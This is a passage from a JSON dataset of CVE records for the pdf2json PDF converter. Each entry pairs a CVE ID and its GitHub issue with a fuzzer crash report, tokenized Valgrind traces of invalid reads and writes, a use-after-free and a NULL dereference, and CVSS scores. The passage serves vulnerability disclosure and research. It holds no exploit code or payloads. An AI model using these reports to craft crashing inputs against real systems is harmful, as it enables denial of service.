(in PATHTAG NUMBERTAG by NUMBERTAG FB1F: APITAG int, Object ) (in PATHTAG NUMBERTAG If you believe this happened as a result of a stack NUMBERTAG overflow in your program's main thread (unlikely but NUMBERTAG possible), you can try to increase the size of the NUMBERTAG main thread stack using the main stacksize= flag NUMBERTAG The main thread stack size used in this run was NUMBERTAG Stack overflow in thread NUMBERTAG can't grow stack to NUMBERTAG ffe NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGSEG NUMBERTAG Access not within mapped region at address APITAG NUMBERTAG Stack overflow in 
thread NUMBERTAG can't grow stack to NUMBERTAG ffe NUMBERTAG at NUMBERTAG A NUMBERTAG APITAG (in PATHTAG NUMBERTAG If you believe this happened as a result of a stack NUMBERTAG overflow in your program's main thread (unlikely but NUMBERTAG possible), you can try to increase the size of the NUMBERTAG main thread stack using the main stacksize= flag NUMBERTAG The main thread stack size used in this run was NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG bytes allocated NUMBERTAG LEAK SUMMARY NUMBERTAG definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Rerun with leak check=full to see details of leaked memory NUMBERTAG For counts of detected and suppressed errors, rerun with NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG Segmentation fault ~~~ Thanks, Manh Dung",
  51372. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  51373. "severity": "MEDIUM",
  51374. "baseScore": 5.5,
  51375. "impactScore": 3.6,
  51376. "exploitabilityScore": 1.8
  51377. },
  51378. {
  51379. "CVE_ID": "CVE-2020-19465",
  51380. "Issue_Url_old": "https://github.com/flexpaper/pdf2json/issues/26",
  51381. "Issue_Url_new": "https://github.com/flexpaper/pdf2json/issues/26",
  51382. "Repo_new": "flexpaper/pdf2json",
  51383. "Issue_Created_At": "2019-05-27T23:08:39Z",
  51384. "description": "Segmentation fault on APITAG Hi, Our fuzzer found a crash due to an invalid read on the function APITAG APITAG URLTAG Valgrind says ~~~ valgrind pdf2json APITAG /dev/null NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: ./pdf2json APITAG /dev/null NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG D NUMBERTAG APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG FB NUMBERTAG APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG D9: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG B NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG B5FA: APITAG , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG B3B4: APITAG , APITAG , APITAG , void ) (in PATHTAG NUMBERTAG by NUMBERTAG main APITAG NUMBERTAG Address NUMBERTAG is not stack'd, malloc'd or (recently) free'd NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGSEG NUMBERTAG Access not within mapped region at address NUMBERTAG at NUMBERTAG D NUMBERTAG APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG FB NUMBERTAG APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG D9: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG B NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG B5FA: APITAG , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG B3B4: APITAG , APITAG , APITAG , void ) (in PATHTAG NUMBERTAG by NUMBERTAG main APITAG NUMBERTAG If you believe this happened as a result of a stack NUMBERTAG overflow in your program's main thread (unlikely but NUMBERTAG possible), you can try to increase the size of the NUMBERTAG main thread stack using the main stacksize= flag NUMBERTAG The main thread stack size used in this run was NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG bytes allocated NUMBERTAG LEAK SUMMARY NUMBERTAG 
definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Rerun with leak check=full to see details of leaked memory NUMBERTAG For counts of detected and suppressed errors, rerun with NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG Segmentation fault ~~~ Thanks, Manh Dung",
  51385. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  51386. "severity": "MEDIUM",
  51387. "baseScore": 5.5,
  51388. "impactScore": 3.6,
  51389. "exploitabilityScore": 1.8
  51390. },
  51391. {
  51392. "CVE_ID": "CVE-2020-19466",
  51393. "Issue_Url_old": "https://github.com/flexpaper/pdf2json/issues/27",
  51394. "Issue_Url_new": "https://github.com/flexpaper/pdf2json/issues/27",
  51395. "Repo_new": "flexpaper/pdf2json",
  51396. "Issue_Created_At": "2019-05-27T23:09:01Z",
  51397. "description": "Segmentation fault on APITAG Hi, Our fuzzer found a crash due to an invalid read on the function APITAG APITAG URLTAG Valgrind says: ~~~ valgrind pdf2json APITAG /dev/null NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG B: APITAG short , int , unsigned char ) (in PATHTAG NUMBERTAG by NUMBERTAG B: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG FB6: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Address NUMBERTAG fd NUMBERTAG is not stack'd, malloc'd or (recently) free'd NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGSEG NUMBERTAG Access not within mapped region at address NUMBERTAG FD NUMBERTAG at NUMBERTAG B: APITAG short , int , unsigned char ) (in PATHTAG NUMBERTAG by NUMBERTAG B: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG FB6: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG 
NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG If you believe this happened as a result of a stack NUMBERTAG overflow in your program's main thread (unlikely but NUMBERTAG possible), you can try to increase the size of the NUMBERTAG main thread stack using the main stacksize= flag NUMBERTAG The main thread stack size used in this run was NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG bytes allocated NUMBERTAG LEAK SUMMARY NUMBERTAG definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Rerun with leak check=full to see details of leaked memory NUMBERTAG For counts of detected and suppressed errors, rerun with NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG Segmentation fault ~~~ Thanks, Manh Dung",
  51398. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  51399. "severity": "MEDIUM",
  51400. "baseScore": 5.5,
  51401. "impactScore": 3.6,
  51402. "exploitabilityScore": 1.8
  51403. },
  51404. {
  51405. "CVE_ID": "CVE-2020-19467",
  51406. "Issue_Url_old": "https://github.com/flexpaper/pdf2json/issues/28",
  51407. "Issue_Url_new": "https://github.com/flexpaper/pdf2json/issues/28",
  51408. "Repo_new": "flexpaper/pdf2json",
  51409. "Issue_Created_At": "2019-05-28T05:41:37Z",
  51410. "description": "Segmentation fault (use after free) on APITAG Hi, Our fuzzer found a crash due to an Use After Free bug on the function APITAG (the latest commit b NUMBERTAG b NUMBERTAG on master version NUMBERTAG APITAG URLTAG Valgrind says: ~~~ pdf2json APITAG /dev/null NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG APITAG short , int , unsigned char ) (in PATHTAG NUMBERTAG by NUMBERTAG B: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG D7: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E8: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A5B: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C8: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG BE: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Address NUMBERTAG b NUMBERTAG c NUMBERTAG is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2F NUMBERTAG B: operator delete(void ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG D: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG D: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG D: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG D: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG D: APITAG (in PATHTAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG C2E0EF: operator new(unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by 
NUMBERTAG BE: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG BE: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG BE: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG BE: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG BE: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG BE: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG B: APITAG short , int , unsigned char ) (in PATHTAG NUMBERTAG by NUMBERTAG B: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG D7: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E8: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A5B: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C8: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG BE: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Address NUMBERTAG ff NUMBERTAG c is not stack'd, malloc'd or (recently) free'd NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGSEG NUMBERTAG Access not within mapped region at address NUMBERTAG FF NUMBERTAG C NUMBERTAG at NUMBERTAG B: APITAG short , int , unsigned char ) (in PATHTAG NUMBERTAG by NUMBERTAG B: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG D7: APITAG (in PATHTAG NUMBERTAG by 
NUMBERTAG E8: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A5B: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C8: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG BE: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG If you believe this happened as a result of a stack NUMBERTAG overflow in your program's main thread (unlikely but NUMBERTAG possible), you can try to increase the size of the NUMBERTAG main thread stack using the main stacksize= flag NUMBERTAG The main thread stack size used in this run was NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG bytes allocated NUMBERTAG LEAK SUMMARY NUMBERTAG definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Rerun with leak check=full to see details of leaked memory NUMBERTAG For counts of detected and suppressed errors, rerun with NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG Segmentation fault ~~~ Thanks, Manh Dung",
  51411. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  51412. "severity": "MEDIUM",
  51413. "baseScore": 5.5,
  51414. "impactScore": 3.6,
  51415. "exploitabilityScore": 1.8
  51416. },
  51417. {
  51418. "CVE_ID": "CVE-2020-19468",
  51419. "Issue_Url_old": "https://github.com/flexpaper/pdf2json/issues/29",
  51420. "Issue_Url_new": "https://github.com/flexpaper/pdf2json/issues/29",
  51421. "Repo_new": "flexpaper/pdf2json",
  51422. "Issue_Created_At": "2019-05-28T05:57:15Z",
  51423. "description": "Segmentation fault (NULL pointer dereference) on APITAG Hi, Our fuzzer found a crash due to a NULL pointer dereference bug on the function APITAG (the latest commit b NUMBERTAG b NUMBERTAG on master version NUMBERTAG APITAG URLTAG Valgrind says: ~~~ valgrind pdf2json APITAG /dev/null NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: ./pdf2json APITAG /dev/null NUMBERTAG Error: May not be a PDF file (continuing anyway) Error: PDF file is damaged attempting to reconstruct xref table... Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Illegal character ')' Error: Unterminated string Error: Bad image parameters NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG ECFA: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG 
NUMBERTAG Address NUMBERTAG is not stack'd, malloc'd or (recently) free'd NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGSEG NUMBERTAG Access not within mapped region at address NUMBERTAG at NUMBERTAG ECFA: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG If you believe this happened as a result of a stack NUMBERTAG overflow in your program's main thread (unlikely but NUMBERTAG possible), you can try to increase the size of the NUMBERTAG main thread stack using the main stacksize= flag NUMBERTAG The main thread stack size used in this run was NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG bytes allocated NUMBERTAG LEAK SUMMARY NUMBERTAG definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Rerun with leak check=full to see details of leaked memory NUMBERTAG For counts of detected and suppressed errors, rerun with NUMBERTAG ERROR SUMMARY NUMBERTAG 
errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG Segmentation fault ~~~ Thanks, Manh Dung",
  51424. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  51425. "severity": "MEDIUM",
  51426. "baseScore": 5.5,
  51427. "impactScore": 3.6,
  51428. "exploitabilityScore": 1.8
  51429. },
  51430. {
  51431. "CVE_ID": "CVE-2020-19469",
  51432. "Issue_Url_old": "https://github.com/flexpaper/pdf2json/issues/30",
  51433. "Issue_Url_new": "https://github.com/flexpaper/pdf2json/issues/30",
  51434. "Repo_new": "flexpaper/pdf2json",
  51435. "Issue_Created_At": "2019-05-28T06:47:45Z",
  51436. "description": "Segmentation fault on APITAG Hi, Our fuzzer found a crash due to an invalid write on the function APITAG (the latest commit b NUMBERTAG b NUMBERTAG on master version NUMBERTAG APITAG URLTAG Valgrind says: ~~~ valgrind pdf2json APITAG /dev/null NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: ./pdf2json APITAG /dev/null NUMBERTAG Error NUMBERTAG Illegal character ')' Error: PDF file is damaged attempting to reconstruct xref table... Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Illegal character '>' Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object NUMBERTAG Invalid write of size NUMBERTAG at NUMBERTAG D2D: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in 
PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Address NUMBERTAG b1b NUMBERTAG is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2E0EF: operator new(unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG CF NUMBERTAG APITAG , Stream , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG AFF: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG FA NUMBERTAG APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A9: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Conditional jump or move depends on uninitialised value(s NUMBERTAG at NUMBERTAG A NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG B NUMBERTAG APITAG , APITAG , int , int ) (in PATHTAG 
NUMBERTAG by NUMBERTAG CF: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG FB6: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DF: APITAG , Lexer , int) (in PATHTAG NUMBERTAG by NUMBERTAG F8: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG Error NUMBERTAG Bad Huffman code in DCT stream NUMBERTAG Use of uninitialised value of size NUMBERTAG at NUMBERTAG ACFE: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG BEB: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A5AA: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG ACFE: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG BEB: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A5AA: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , 
int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Address NUMBERTAG is not stack'd, malloc'd or (recently) free'd NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGSEG NUMBERTAG Access not within mapped region at address NUMBERTAG at NUMBERTAG ACFE: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG BEB: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A5AA: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG If you believe this happened as a result of a stack NUMBERTAG overflow in your program's main thread (unlikely but NUMBERTAG possible), you can try to increase the size of the NUMBERTAG main thread stack using the main stacksize= flag NUMBERTAG The main thread stack size used in this run was NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees 